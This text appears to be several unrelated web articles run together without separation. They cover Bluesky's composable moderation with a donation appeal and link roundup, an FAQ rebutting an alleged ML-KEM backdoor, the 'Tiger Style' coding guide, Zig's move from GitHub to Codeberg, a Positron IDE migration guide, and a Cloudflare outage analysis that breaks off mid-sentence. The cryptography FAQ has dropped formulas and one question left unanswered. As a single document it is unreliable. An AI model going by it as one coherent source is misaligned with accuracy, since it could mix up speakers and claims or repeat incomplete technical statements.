The Trump administration, led by a President who was previously banned from major social networks for inciting violence and spreading disinformation after the 2020 US election, poses a particular challenge for the upstart platform Bluesky.
As Erin Kissane noted
in a recent article in Tech Policy Press, Bluesky was designed for openness and interoperability, yet it now finds itself as a single point of pressure. If it enforces
its rules against harassment and incitement
against official Trump administration accounts for some future infraction, it risks
political retaliation.
If it weakens its rules or shies away from enforcement, it may lose the trust of the communities who turned to the network for protection from coordinated abuse.
Composable moderation, which decentralizes rule-setting by letting users pick the moderation services that best reflect their needs and values, mitigates this problem. It shifts enforcement away from a single platform and into a distributed ecosystem of user-selected moderation services. With no central referee to target, political actors and influencers lose the ability to “work the refs” and pressure a singular trust and safety team into making decisions that favor their side.
Spreading the burden of moderation
“Bluesky the app” is the company’s shorthand for distinguishing its consumer-facing social app from the AT Protocol, the decentralized social networking protocol it is building. The app is just one client in what is intended to become a broader ecosystem of services built on the protocol. For now, however, Bluesky the company still carries the full responsibility for moderation and governance across the AT Protocol.
Centralized governance of a decentralized protocol cannot withstand sustained political or social pressure. When one company sets moderation rules for a network that is meant to be open and distributed, it becomes a single point of influence that governments, interest groups and powerful users can target. As AT Protocol’s
Ethos
statement
makes clear, its long-term vision sits at the intersection of three movements: the early web’s open publishing model, the peer-to-peer push for self-certifying and decentralized data, and the large-scale distributed systems that underpin modern internet services.
Bluesky’s goal is for AT Protocol to embody the openness of the web, the user-control of peer-to-peer networks, and the performance of modern platforms. In the future, we could see photo-sharing apps, community forums, research tools and more all using the same identities and social graph. Bluesky is only one expression of the protocol, not the limit of it.
Composable moderation is the feature that will make that possible. Rather than treating moderation as a network-wide ban, it uses labels to describe issues with content or accounts, leaving individual apps to decide how to act on them. Following
a letter
from Daphne Keller, Martin Husovec, and my colleague Mallory Knodel,
Bluesky has committed
to this approach.
Instead of blocking someone in a way that removes them from every app built on the protocol, Bluesky will mark a suspended account with a label that only affects how that account appears inside Bluesky. Other apps can choose to hide the account, show it with a warning, or ignore the label entirely. This also keeps the user’s underlying account intact, because it’s stored on their personal data server or PDS, the place where their identity and posts live, which should only cut someone off for serious issues like illegal content. The result is a more flexible, decentralized system where no single app controls whether someone exists on the network.
Why this approach solves the potential Trump problem
The closest analogy to existing social media is to how Reddit operates: the platform sets a baseline of what is acceptable, but thousands of subreddit communities apply their own rules, filters, and enforcement styles on top. For example, r/AskHistorians expects in-depth, well-sourced answers that reflect current academic research, and moderators routinely remove unsourced or speculative replies that don’t meet that standard. Composable moderation takes that layered, community-defined model and implements it at the protocol level, so many different apps and services can choose the moderation approaches that fit their values.
And because moderation could be provided by many different apps and services, not just Bluesky, it would reduce the political vulnerability that comes from having a single company responsible for every enforcement call. Communities can also choose moderation services that reflect their own context and needs, giving vulnerable groups more control over the protections they rely on. And if one app or operator fails or comes under political pressure, others can continue enforcing their own standards without breaking the network.
Taken together, this shift could help Bluesky, and future AT Protocol services, navigate the pressures Kissane highlights, distributing power across the network rather than concentrating it in a single company.
Support the
Exchange Point
— Your Donation Helps Us Build a Feminist Future
If you love our work and want to power more of it, here are the ways to support EXP and
our projects
:
🔐 Protect digital rights with a tax-deductible donation.
Give directly through
PayPal
(tax deductible in the U.S.). ➡️
https://exchangepoint.tech/donations
🌱 Double your impact with employer matching.
Most tech companies match donations through
Benevity
— search “Exchange Point.” Here are three projects to support with matching donations: ➡️ Social Web ➡️ Human Rights and Standards ➡️ Protect E2EE
📅 Sustain the movement with a large or recurring monthly gift.
Become a monthly supporter and help us plan long-term. ➡️ Please email
grants@exchangepoint.tech
.
🛠️ Fund the work through contracts or sponsored projects.
Partner with us on research, workshops, audits, or ecosystem strategy. ➡️
Work with us
!
🩵 Support our sister effort on the Free Our Feeds campaign.
Chip in through the FOF community GoFundMe. ➡️
https://gofund.me/1ef4d5d5d
Thank you for helping us build an open, joyful, people-powered internet.
The Internet still depends on fragile paperwork to prove who controls an IP address. The Internet Society explores how a new tool, the RPKI Signed Checklist, can use cryptographic proof to replace these weak systems and make routing more secure.
https://www.arin.net/blog/2025/11/19/2024-grant-report-isoc
Apple and Google’s Play stores shape what apps are available to most people as they use the Internet. When those app stores block or limit apps based on government requests, they are shaping what people can do, say, communicate, and experience, says ACLU’s Daniel Kahn Gillmor.
https://www.aclu.org/news/free-speech/app-store-oligopoly
Podcast: American Prestige. Silicon Valley and the Israeli Occupation, featuring Omar Zahzah, Assistant Professor of Arab Muslim Ethnicities and Diasporas Studies at San Francisco State University, discussing his book Terms of Servitude: Zionism, Silicon Valley, and Digital Settler Colonialism.
https://americanprestigepod.com/episodes/4215556855
Airbnb.org is offering emergency housing to families displaced by disasters, and any donation made before 31 December will be matched to double the number of nights provided.
https://www.airbnb.org/giftanight
The Arab Center for Social Media Development (ACSD) is pleased to announce the opening of proposals for workshops and sessions at the Palestine Digital Activism Forum 2026, Forms are due
December 15.
https://pdaf.net/invitation
There have been some recent concerns about ML-KEM, NIST’s standard for encryption with Post-Quantum Cryptography, related standards of the IETF, and lots of conspiracy theories about malicious actors subverting the standardization process. As someone who has been involved with this standardization process at pretty much every level, here a quick debunking of the various nonsense I have heard. So let’s get started, FAQ style.
Did the NSA invent ML-KEM?
No. It was first specified by a team of various European cryptographers, whom you can look up
on their website
.
Okay, but that was Kyber, not ML-KEM, did the NSA change Kyber?
No. The differences between Kyber and ML-KEM are pretty minute, mostly editorial changes by NIST. The only change that could be seen as actually interesting was a slight change to how certain key derivation mechanics worked. This change was suggested by Peter Schwabe, one of the original authors of Kyber, and is fairly straightforward to analyze. The reason for this change was that originally, Kyber was able to produce shared secrets of any length, by including a KDF step. But applications usually need their own KDF to apply to shared secrets, in order to bind the shared secret to transcripts and similar, so you would end up with two KDF calls. Since Kyber only uses the KDF to stretch the output, removing it slightly improves the performance of the algorithm without having any security consequences. Basically, there was a feature that turned out to not actually be a feature in real world scenarios, so NIST removed it, after careful consideration, and after being encouraged to do so by the literal author of the scheme, and under the watchful eyes of the entire cryptographic community. Nothing untoward happened here.
Okay but what about maybe there still being a backdoor?
There is no backdoor in ML-KEM, and I can prove it. For something to be a backdoor, specifically a “Nobody but us backdoor” (NOBUS), you need some way to ensure that nobody else can exploit it, otherwise it is not a backdoor, but a broken algorithm, and any internal cryptanalysis you might have will be caught up eventually by academia. So for something to be a useful backdoor, you need to possess some secret that cannot be brute forced that acts as a private key to unlock any ciphertext generated by the algorithm. This is the backdoor in DUAL_EC_DRBG, and, since the US plans to use ML-KEM themselves (as opposed to the export cipher shenanigans back in the day), would be the only backdoor they could reasonably insert into a standard.
However, if you have a private key, that cannot be brute forced, you need to have a public key as well, and that public key needs to be large enough to prevent brute-forcing, and be embedded into the algorithm, as a parameter. And in order to not be brute forceable, this public key needs to have at least 128 bits of entropy. This gives us a nice test to see whether a scheme is capable of having cryptographic NOBUS backdoors: We tally up the entropy of the parameter space. If the result is definitely less than 128 bits, the scheme can at most be broken, but cannot be backdoored.
So let’s do that for ML-KEM:
This is the set of parameters, let’s tally them up, with complete disregard for any of the choices being much more constrained than random integers would suggest (actually, I am too much of a nerd to not point out the constraints, but I will use the larger number for the tally).
Degree of the number field: 8 bits (actually, it has to be a power of two, so really only 3 bits)
Prime: 12 bits (actually, it has to be a prime, so 10.2 bits (Actually, actually, it has to be a prime of the form
, and it has to be at least double the rank times degree, and 3329 is literally the smallest prime that fits that bill))
Rank of the module: 3 bits (well, the rank of the module is the main security parameter, it literally just counts from 2 to 4)
Secret and error term bounds: 2 + 2 bits (really these come from the size of the prime, the module rank, and the number field degree)
Compression strength: 4 + 3 bits
In total, this gives us 34 bits. Counted exceedingly generously. I even gave an extra bit for all the small numbers! Any asymmetric cryptosystem with a 34 bit public key would be brute forceable by a laptop within a few minutes, and ML-KEM would not be backdoored, but rather be broken.
There is no backdoor in ML-KEM, because there simply is no space to hide a backdoor in ML-KEM
.
And just to be sure, if you apply this same counting bits of parameters test to the famously backdoored DUAL_EC_DRBG, you indeed have multiple elliptic curve points defined in the standard without any motivation, immediately blowing our 128 bits of entropy budget for parameters. In fact, it would be trivial to fix DUAL_EC_DRBG by applying what’s called a “Nothing up my sleeves” paradigm: Instead of just having the elliptic curves points sit there, with no explanation, make it so that they are derived from digits of π, e, or the output of some hash function on some published seed. That would still not pass our test, but that is because I designed this test to be way too aggressive, as the remarks in the brackets show, there is not really any real choice to these parameters, they are just the smallest set of parameters that result in a secure scheme (making them larger would only make the scheme slower and/or have more overhead).
So no, there is no backdoor in ML-KEM.
But didn’t NIST fail basic math when picking ML-KEM?
I thought ML-KEM was broken, something about a fault attack?
There are indeed fault attacks on ML-KEM. This is not super surprising, if you know what a fault attack (also called glitch attack) is. For a fault attack, you need to insert a mistake – a fault – in the computation of the algorithm. You can do this via messing with the physical hardware, things like ROWHAMMER that literally change the memory while the computation is happening. It’s important to analyze these types of failures, but literally any practical cryptographic algorithm in existence is vulnerable to fault attacks.
It’s literally computers failing at their one job and not computing very well. CPU and memory attacks are probably one of the most powerful families of attacks we have, and they have proven to be very stubborn to mitigate. But algorithms failing in the face of them is not particularly surprising, after all, if you can flip a single arbitrary bit, you might as well just set “verified_success” to true and call it a day. Technically, this is the strongest form of fault, where the attacker choses where it occurs, but even random faults usually demolish pretty much any cryptographic algorithm, and us knowing about these attacks is merely evidence of an algorithm being seen as important enough to do the math of how exactly they fail when you literally pull the ground out beneath them.
But what about decryption failure attacks? Those sound scary!
ML-KEM has a weird quirk: It is, theoretically, possible to create a ciphertext, in an honest fashion, that the private key holder will reject. If one were to successfully do so, one would learn information about the private key. But here comes the kicker: The only way to create this poisoned ciphertext is by honestly running the encapsulation algorithm, and hoping to get lucky. There is a slight way to bias the ciphertexts, but to do so, one still has to compute them, and the advantage would be abysmal, since ML-KEM forces the hand of the encapsulating party on almost all choices. The probability of this decapsulation failure can be compute with relatively straight-forward mathematics, the Cauchy-Schwartz inequality. And well, the parameters of ML-KEM are chosen in such a way that the actual probability is vanishingly small, less than
. At this point, the attacker cannot really assume that they were observing a decapsulation failure anymore, as a whole range of other incredibly unlikely events, such as enough simultaneous bit flips due to cosmic radiation to evade error detection are far more likely. It is true that after the first decapsulation failure has been observed, the attacker has much more abilities to stack the deck in their favor, but to do so, you first need the first failure to occur, and there is not really any hope in doing so.
On top of this, the average ML-KEM key is used exactly once, as such is the fate of keys used in key exchange, further making any adaptive attack like this meaningless, but ML-KEM keys are safe to use even with multiple decapsulations.
But wasn’t there something called Kyberslash?
Yeah
. It turns out, implementing cryptographic code is still hard. My modest bragging right is that
my implementation
, which would eventually morph into BoringSSL’s ML-KEM implementation, never had this problem, so I guess the answer here is to git gud, or something. But really, especially initially, there are some rough edges in new implementations as we learn the right techniques to avoid them. Importantly, this is a flaw of the implementation, not of the mathematics of the algorithm. In fact, the good news here is that implementationwise, ML-KEM is actually a lot simpler than elliptic curves are, so these kinds of minor side channel issues are likely to be rarer here, we just haven’t implemented it as much as elliptic curves.
Okay, enough about ML-KEM, what about hybrids and the IETF?
Okay, this one is a funny one. Well funny if you likely deeply dysfunctional bikeshedding, willful misunderstanding, and drama. First of, what are hybrids? Assume you have two cryptographic schemes that do the same thing, and you distrust both of them. But you do trust the combination of the two. That is, in essence, what hybrids allow you to do: Combine two schemes of the same type into one, so that the combined scheme is at least as secure as either of them. The usual line is that this is perfect for PQC, as it allows you to combine the well studied security of classical schemes with the quantum resistance of PQC schemes. Additionally, the overhead of elliptic curve cryptography, when compared with lattice cryptography, is tiny, so why not throw it in there. And generally I agree with that stance, although I would say that my trust in lattice cryptography is pretty much equal to my trust in elliptic curves, and quite a bit higher than my trust in RSA, so I would not see hybrids as absolutely, always and at every turn, superduper essential. But they are basically free, so why not? In the end, yes, hybrids are the best way to go, and indeed, this is what the IETF enabled people to do. There are various RFCs to that extent, to understand the current controversy, we need to focus on two TLS related ones: X25519MLKEM768 aka 0x11EC, and MLKEM1024. The former is a hybrid, the latter is not. And, much in line with my reasoning, 0x11EC is the default key exchange algorithm used by Chrome, Firefox, and pretty much all other TLS clients that currently support PQC. So what’s the point of MLKEM1024? Well it turns out there is one customer who really really hates hybrids, and only wants to use ML-KEM1024 for all their systems. And that customer happens to be the NSA. And honestly, I do not see a problem with that. If the NSA wants to make their own systems inefficient, then that is their choice. Why inefficient? It turns out that, due to the quirks of how TLS works, the client needs to predict what the server will likely accept. They could predict more things, but since PQC keys are quite chonky, sending more than one PQC key is making your handshakes slower. And so does mispredicting, since it results in the server saying “try again, with the right public key, this time”. So, if everyone but the NSA uses X25519MLKEM768, the main effect is that the NSA has slower handshakes. As said, I don’t think it’s reasonable to say their handshakes are substantially less secure, but sure, if you really think ML-KEM is broken, then yes, the NSA has successfully undermined the IETF in order to make their own systems less secure, while not impacting anyone else. Congratulations to them, I guess.
But doesn’t the IETF actively discourage hybrids?
No. To understand this, we need to look at two flags that come with TLS keyexchange algorithms: Recommended and Mandatory To Implement. Recommended is a flag with three values, Yes, No, and Discouraged. The Discouraged state is used for algorithms known to be broken, such as RC4. Clearly ML-KEM, with or without a hybrid, is not known to be broken, so Discouraged is the wrong category. It is true that 0x11EC is not marked as Recommended, mostly because it started out as an experimental combination that then somehow ended up as the thing everybody was doing, and while lots of digital ink was spilled on whether or not it should be recommended, nobody updated the flag before publishing the RFC. (technically the RFC is not published yet, but the rest is pretty much formality, and the flag is unlikely to change) So yes, technically the IETF did not recommend a hybrid algorithm. But your browsers and everybody else is using it, so there is that. And just in case you were worried about that, the NSA option of MLKEM1024 is also not marked as recommended.
Lastly, Mandatory To Implement is an elaborate prank by the inventors of TLS to create more discussions on mailing lists. As David Benjamin once put it, the only algorithm that is actually mandatory to implement is the null algorithm, as that is the name of the initial state of a TLS connection, before an algorithm has been negotiated. Otherwise, at least my recommendation, is to respond with this gif
whenever someone requests a MTI algorithm you don’t want to support. The flag has literally zero meaning. Oh and yeah, neither of the two algorithms is MTI.
TigerStyle: Coding philosophy focused on safety, performance, dev experience
Tiger Style
is a coding philosophy focused on
safety
,
performance
, and
developer experience
. Inspired by the practices of
TigerBeetle, it focuses on building robust, efficient, and maintainable
software through disciplined engineering.
Tiger Style is not just a set of coding standards; it's a practical
approach to software development. By prioritizing
safety
,
performance
, and
developer experience
, you create code that is reliable,
efficient, and enjoyable to work with.
Safety
Safety is the foundation of Tiger Style. It means writing code that
works in all situations and reduces the risk of errors. Focusing on
safety makes your software reliable and trustworthy.
Performance
Performance is about using resources efficiently to deliver fast,
responsive software. Prioritizing performance early helps you design
systems that meet or exceed user expectations.
Developer experience
A good developer experience improves code quality and maintainability.
Readable and easy-to-work-with code encourages collaboration and reduces
errors, leading to a healthier codebase that stands the test of time
[1]
.
2. Design goals
The design goals focus on building software that is safe, fast, and easy
to maintain.
2.1. Safety
Safety in coding relies on clear, structured practices that prevent
errors and strengthen the codebase. It's about writing code that works
in all situations and catches problems early. By focusing on safety, you
create reliable software that behaves predictably no matter where it
runs.
Control and limits
Predictable control flow and bounded system resources are essential for
safe execution.
Simple and explicit control flow
: Favor
straightforward control structures over complex logic. Simple
control flow makes code easier to understand and reduces the risk of
bugs. Avoid recursion if possible to keep execution bounded and
predictable, preventing stack overflows and uncontrolled resource
use.
Set fixed limits
: Set explicit upper bounds on
loops, queues, and other data structures. Fixed limits prevent
infinite loops and uncontrolled resource use, following the
fail-fast
principle. This approach helps catch
issues early and keeps the system stable.
Limit function length
: Keep functions concise,
ideally under
70 lines
. Shorter functions are
easier to understand, test, and debug. They promote single
responsibility, where each function does one thing well, leading to
a more modular and maintainable codebase.
Centralize control flow
: Keep switch or if
statements in the main parent function, and move non-branching logic
to helper functions. Let the parent function manage state, using
helpers to calculate changes without directly applying them. Keep
leaf functions pure and focused on specific computations. This
divides responsibility: one function controls flow, others handle
specific logic.
Memory and types
Clear and consistent handling of memory and types is key to writing
safe, portable code.
Use explicitly sized types
: Use data types with
explicit sizes, like
u32
or
i64
, instead
of architecture-dependent types like
usize
. This keeps
behavior consistent across platforms and avoids size-related errors,
improving portability and reliability.
Static memory allocation
: Allocate all necessary
memory during startup and avoid dynamic memory allocation after
initialization. Dynamic allocation at runtime can cause
unpredictable behavior, fragmentation, and memory leaks. Static
allocation makes memory management simpler and more predictable.
Minimize variable scope
: Declare variables in the
smallest possible scope. Limiting scope reduces the risk of
unintended interactions and misuse. It also makes the code more
readable and easier to maintain by keeping variables within their
relevant context.
Error handling
Correct error handling keeps the system robust and reliable in all
conditions.
Use assertions
: Use assertions to verify that
conditions hold true at specific points in the code. Assertions work
as internal checks, increase robustness, and simplify debugging.
Assert function arguments and return values
:
Check that functions receive and return expected values.
Validate invariants
: Keep critical conditions
stable by asserting invariants during execution.
Use pair assertions
: Check critical data at
multiple points to catch inconsistencies early.
Fail fast on programmer errors
: Detect unexpected
conditions immediately, stopping faulty code from continuing.
Handle all errors
: Check and handle every error.
Ignoring errors can lead to undefined behavior, security issues, or
crashes. Write thorough tests for error-handling code to make sure
your application works correctly in all cases.
Treat compiler warnings as errors
: Use the
strictest compiler settings and
treat all warnings as errors
. Warnings often point
to potential issues that could cause bugs. Fixing them right away
improves code quality and reliability.
Avoid implicit defaults
: Explicitly specify options
when calling library functions instead of relying on defaults.
Implicit defaults can change between library versions or across
environments, causing inconsistent behavior. Being explicit improves
code clarity and stability.
2.2. Performance
Performance is about using resources efficiently to deliver fast,
responsive software. Prioritizing performance early helps design systems
that meet or exceed user expectations without unnecessary overhead.
Design for performance
Early design decisions have a significant impact on performance.
Thoughtful planning helps avoid bottlenecks later.
Design for performance early
: Consider performance
during the initial design phase. Early architectural decisions have
a big impact on overall performance, and planning ahead ensures you
can avoid bottlenecks and improve resource efficiency.
Napkin math
: Use quick, back-of-the-envelope
calculations to estimate system performance and resource costs. For
example, estimate how long it takes to read 1 GB of data from memory
or what the expected storage cost will be for logging 100,000
requests per second. This helps set practical expectations early and
identify potential bottlenecks before they occur.
Batch operations
: Amortize expensive operations by
processing multiple items together. Batching reduces overhead per
item, increases throughput, and is especially useful for I/O-bound
operations.
Efficient resource use
Focus on optimizing the slowest resources, typically in this order:
Network
: Optimize data transfer and reduce latency.
Disk
: Improve I/O operations and manage storage
efficiently.
Memory
: Use memory effectively to prevent leaks and
overuse.
CPU
: Increase computational efficiency and reduce
processing time.
Predictability
Writing predictable code improves performance by reducing CPU cache
misses and optimizing branch prediction.
Ensure predictability
: Write code with predictable
execution paths. Predictable code uses CPU caching and branch
prediction better, leading to improved performance. Avoid patterns
that cause frequent cache misses or unpredictable branching, as they
degrade performance.
Reduce compiler dependence
: Don't rely solely on
compiler optimizations for performance. Write clear, efficient code
that doesn't depend on compiler behavior. Be explicit in
performance-critical sections to ensure consistent results across
compilers.
2.3. Developer experience
Improving the developer experience creates a more maintainable and
collaborative codebase.
Name things
Get the nouns and verbs right. Great names capture what something is or
does and create a clear, intuitive model. They show you understand the
domain. Take time to find good names, where nouns and verbs fit
together, making the whole greater than the sum of its parts.
Clear and consistent naming
: Use descriptive and
meaningful names for variables, functions, and files. Good naming
improves code readability and helps others understand each
component's purpose. Stick to a consistent style, like
snake_case
, throughout the codebase.
Avoid abbreviations
: Use full words in names unless
the abbreviation is widely accepted and clear (e.g.,
ID
,
URL
). Abbreviations can be confusing
and make it harder for others, especially new contributors, to
understand the code.
Include units or qualifiers in names
: Append units
or qualifiers to variable names, placing them in descending order of
significance (e.g.,
latency_ms_max
instead of
max_latency_ms
). This clears up meaning, avoids
confusion, and ensures related variables, like
latency_ms_min
, line up logically and group together.
Document the 'why'
: Use comments to explain why
decisions were made, not just what the code does. Knowing the intent
helps others maintain and extend the code properly. Give context for
complex algorithms, unusual approaches, or key constraints.
Organize things
Organizing code well makes it easy to navigate, maintain, and extend. A
logical structure reduces cognitive load, letting developers focus on
solving problems instead of figuring out the code. Group related
elements, and simplify interfaces to keep the codebase clean, scalable,
and manageable as complexity grows.
Organize code logically
: Structure your code
logically. Group related functions and classes together. Order code
naturally, placing high-level abstractions before low-level details.
Logical organization makes code easier to navigate and understand.
Simplify function signatures
: Keep function
interfaces simple. Limit parameters, and prefer returning simple
types. Simple interfaces reduce cognitive load, making functions
easier to understand and use correctly.
Construct objects in-place
: Initialize large
structures or objects directly where they are declared. In-place
construction avoids unnecessary copying or moving of data, improving
performance and reducing the potential for lifecycle errors.
Minimize variable scope
: Declare variables close to
their usage and within the smallest necessary scope. This reduces
the risk of misuse and makes code easier to read and maintain.
Ensure consistency
Maintaining consistency in your code helps reduce errors and creates a
stable foundation for the rest of the system.
Avoid duplicates and aliases
: Prevent
inconsistencies by avoiding duplicated variables or unnecessary
aliases. When two variables represent the same data, there's a
higher chance they fall out of sync. Use references or pointers to
maintain a single source of truth.
Pass large objects by reference
: If a function's
argument is larger than 16 bytes, pass it as a reference instead of
by value to avoid unnecessary copying. This can catch bugs early
where unintended copies may occur.
Minimize dimensionality
: Keep function signatures
and return types simple to reduce the number of cases a developer
has to handle. For example, prefer
void
over
bool
,
bool
over
u64
, and so
on, when it suits the function's purpose.
Handle buffer allocation cleanly
: When working with
buffers, allocate them close to where they are used and ensure all
corresponding cleanup happens in the same logical block. Group
resource allocation and deallocation with clear newlines to make
leaks easier to identify.
Avoid off-by-one errors
Off-by-one errors often result from casual interactions between an
index
, a
count
, or a
size
. Treat
these as distinct types, and apply clear rules when converting between
them.
Indexes, counts, and sizes
: Indexes are 0-based,
counts are 1-based, and sizes represent total memory usage. When
converting between them, add or multiply accordingly. Use meaningful
names with units or qualifiers
to avoid confusion. See
Handle division intentionally
: When dividing, make
your intent clear by specifying how rounding should be handled in
edge cases. Use functions or operators designed for exact division,
floor division, or ceiling division. This avoids ambiguity and
ensures the result behaves as expected.
Code consistency and tooling
Consistency in code style and tools improves readability, reduces mental
load, and makes working together easier.
Maintain consistent indentation
: Use a uniform
indentation style across the codebase. For example, using 4 spaces
for indentation provides better visual clarity, especially in
complex structures.
Limit line lengths
: Keep lines within a reasonable
length (e.g., 100 characters) to ensure readability. This prevents
horizontal scrolling and helps maintain an accessible code layout.
Use clear code blocks
: Structure code clearly by
separating blocks (e.g., control structures, loops, function
definitions) to make it easy to follow. Avoid placing multiple
statements on a single line, even if allowed. Consistent block
structures prevent subtle logic errors and make code easier to
maintain.
Minimize external dependencies
: Reducing external
dependencies simplifies the build process and improves security
management. Fewer dependencies lower the risk of supply chain
attacks, minimize performance issues, and speed up installation.
Standardize tooling
: Using a small, standardized
set of tools simplifies the development environment and reduces
accidental complexity. Choose cross-platform tools where possible to
avoid platform-specific issues and improve portability across
systems.
Addendum
Addendum: Zero technical debt
While Tiger Style focuses on the core principles of safety,
performance, and developer experience, these are reinforced by an
underlying commitment to zero technical debt.
A
zero technical debt policy
is key to maintaining a
healthy codebase and ensuring long-term productivity. Addressing
potential issues proactively and building robust solutions from the
start helps avoid debt that would slow future development.
Do it right the first time
: Take the time to
design and implement solutions correctly from the start. Rushed
features lead to technical debt that requires costly refactoring
later.
Be proactive in problem-solving
: Anticipate
potential issues and fix them before they escalate. Early
detection saves time and resources, preventing performance
bottlenecks and architectural flaws.
Build momentum
: Delivering solid, reliable code
builds confidence and enables faster development cycles.
High-quality work supports innovation and reduces the need for
future rewrites.
Avoiding technical debt ensures that progress is true progress—solid,
reliable, and built to last.
Addendum: Performance estimation
You should think about performance early in design. Napkin math is a
helpful tool for this.
Napkin math uses simple calculations and rounded numbers to quickly
estimate system performance and resource needs.
Quick insights
: Understand system behavior fast
without deep analysis.
Early decisions
: Find potential bottlenecks early
in design.
Sanity checks
: See if an idea works before you
build it.
For example, if you're designing a system to store logs, you can
estimate storage costs like this:
1. Estimate log volume:
Assume 1,000 requests per second (RPS)
Each log entry is about 1 KB
2. Calculate daily log volume:
1,000 RPS * 86,400 seconds/day * 1 KB ≈ 86,400,000 KB/day ≈ 86.4 GB/day
3. Estimate monthly storage:
86.4 GB/day * 30 days ≈ 2,592 GB/month
4. Estimate cost (using $0.02 per GB for blob storage):
2,592 GB * 1000 GB/TB * $0.02/GB ≈ $51 per month
This gives you a rough idea of monthly storage costs. It helps you
check if your logging plan works. The idea is to get within 10x of the
right answer.
This document is a "remix" inspired by the original
Tiger Style guide
from the TigerBeetle project. In the spirit of
Remix Culture
, parts of this document are verbatim
copies of the original work,
while other sections have been rewritten or adapted to fit the goals
of this version. This remix builds upon the principles outlined in the
original document with a more general approach.
Putting aside GitHub’s
relationship with ICE
, it’s abundantly clear that the talented folks who used to work on the product have moved on to bigger and better things, with the remaining losers eager to inflict some kind of bloated, buggy JavaScript framework on us in the name of progress. Stuff that used to be snappy is now sluggish and often entirely broken.
More importantly, Actions is
created by monkeys
and
completely neglected
. After the
CEO of GitHub said to “embrace AI or get out”
, it seems the lackeys at Microsoft took the hint, because GitHub Actions started “vibe-scheduling”; choosing jobs to run seemingly at random. Combined with other bugs and inability to manually intervene, this causes our CI system to get so backed up that not even master branch commits get checked.
Rather than wasting donation money on more CI hardware to work around this crumbling infrastructure, we’ve opted to switch Git hosting providers instead.
As a bonus, we look forward to fewer violations (exhibit
A
,
B
,
C
) of our
strict no LLM / no AI policy
, which I believe are at least in part due to GitHub aggressively pushing the “file an issue with Copilot” feature in everyone’s face.
GitHub Sponsors
The only concern we have in leaving GitHub behind has to do with GitHub Sponsors. This product was key to Zig’s early fundraising success, and it
remains a large portion of our revenue today
. I can’t thank
Devon Zuegel
enough. She appeared like an angel from heaven and single-handedly made GitHub into a viable source of income for thousands of developers. Under her leadership, the future of GitHub Sponsors looked bright, but sadly for us, she, too, moved on to bigger and better things. Since she left, that product as well has been neglected and is already starting to decline.
Although GitHub Sponsors is a large fraction of Zig Software Foundation’s donation income,
we consider it a liability
. We humbly ask if you, reader, are currently donating through GitHub Sponsors, that you consider
moving your recurring donation to Every.org
, which is itself a non-profit organization.
As part of this, we are sunsetting the GitHub Sponsors perks. These perks are things like getting your name onto the home page, and getting your name into the release notes, based on how much you donate monthly. We are working with the folks at Every.org so that we can offer the equivalent perks through that platform.
Migration Plan
Effective immediately, I have made
ziglang/zig on GitHub
read-only, and the canonical origin/master branch of the main Zig project repository is
https://codeberg.org/ziglang/zig.git
.
Thank you to the Forgejo contributors who helped us with our issues switching to the platform, as well as the Codeberg folks who worked with us on the migration - in particular
Earl Warren
,
Otto
,
Gusted
, and
Mathieu Fenniak
.
In the end, we opted for a simple strategy, sidestepping GitHub’s aggressive vendor lock-in: leave the existing issues open and unmigrated, but start counting issues at 30000 on Codeberg so that all issue numbers remain unambiguous. Let us please consider the GitHub issues that remain open as metaphorically “copy-on-write”.
Please leave all your existing GitHub issues and pull requests alone
. No need to move your stuff over to Codeberg unless you need to make edits, additional comments, or rebase.
We’re still going to look at the already open pull requests and issues
; don’t worry.
In this modern era of acquisitions, weak antitrust regulations, and platform capitalism leading to extreme concentrations of wealth, non-profits remain a bastion defending what remains of the commons.
Happy hacking,
Andrew
Migrating to Positron, a next-generation data science IDE for Python and R
Since
Positron
was released from beta, we’ve been working hard to create documentation that could help you, whether you are curious about the IDE or interested in switching. We’ve released two migration guides to help you on your journey, which you can find linked below.
Migrating to Positron from VS Code
Positron is a next-generation IDE for data science, built by Posit PBC. It’s built on Code OSS, the open-source core of Visual Studio Code, which means that many of the features and keyboard shortcuts you’re familiar with are already in place.
However, Positron is specifically designed for data work and includes integrated tools that aren’t available in VS Code by default. These include:
A built-in data explorer: This feature gives you a spreadsheet-style view of your dataframes, making it easy to inspect, sort, and filter data.
An interactive console and variables pane: Positron lets you execute code interactively and view the variables and objects in your session, similar to a traditional data science IDE.
AI assistance: Positron Assistant is a powerful AI tool for data science that can generate and refine code, debug issues, and guide you through exploratory data analysis.
We anticipate many RStudio users will be curious about Positron. When building Positron, we strived to create a familiar interface while adding extensibility and new features, as well as native support for multiple languages. Positron is designed for data scientists and analysts who work with both R and Python and want a flexible, modern, and powerful IDE.
Key features for RStudio users include:
Native multi-language support: Positron is a polyglot IDE, designed from the ground up to support both R and Python seamlessly.
Familiar interface: We designed Positron with a layout similar to RStudio, so you’ll feel right at home with the editor, console, and file panes. We also offer an option to use your familiar RStudio keyboard shortcuts.
Extensibility: Because Positron is built on Code OSS, you can use thousands of extensions from the Open VSX marketplace to customize your IDE and workflow.
Also, check out our migration walkthroughs in Positron itself; find them by searching “Welcome: Open Walkthrough” in the Command Palette (hit the shortcut Cmd + Shift + P to open the Command Palette), or on the Welcome page when you open Positron:
What’s next
We’re committed to making your transition as smooth as possible, and we’ll be continuing to add to these migration guides. Look out for guides for Jupyter users and more!
We’d love to hear from you. What other guides would you like to see? What features would make your transition easier? Join the conversation in our
GitHub Discussions
.
I was at QCon SF during the recent Cloudflare outage (I was hosting the
Stories Behind the Incidents track
), so I hadn’t had a real chance to sit down and do a proper read-through of their
public writeup
and capture my thoughts until now. As always, I recommend you read through the writeup first before you read my take.
All quotes are from the writeup unless indicated otherwise.
Hello
saturation
my old friend
The software had a limit on the size of the feature file that was below its doubled size. That caused the software to fail.
One thing I hope readers take away from this blog post is the complex systems failure mode pattern that resilience engineering researchers call
saturation
. Every complex system out there has limits, no matter how robust that system is. And the systems we deal with have
many, many different kinds of limits
, some of which you might only learn about once you’ve breached that limit. How well a system is able to perform as it approaches one of its limits is what resilience engineering is all about.
Each module running on our proxy service has a number of limits in place to avoid unbounded memory consumption and to preallocate memory as a performance optimization. In this specific instance, the Bot Management system has a limit on the number of machine learning features that can be used at runtime. Currently that limit is set to 200, well above our current use of ~60 features.
In this particular case, the limit was set explicitly.
thread fl2_worker_thread panicked: called Result::unwrap() on an Err value
As sparse as the panic message is, it does explicitly tell you that the problematic call site was an unwrap call. And this is one of the reasons I’m a fan of explicit limits over implicit limits: you tend to get better error messages than when breaching an implicit limit (e.g., of your language runtime, the operating system, the hardware).
A subsystem designed to protect surprisingly inflicts harm
Identify and mitigate automated traffic to protect your domain from bad bots. –
Cloudflare Docs
The problematic behavior was in the
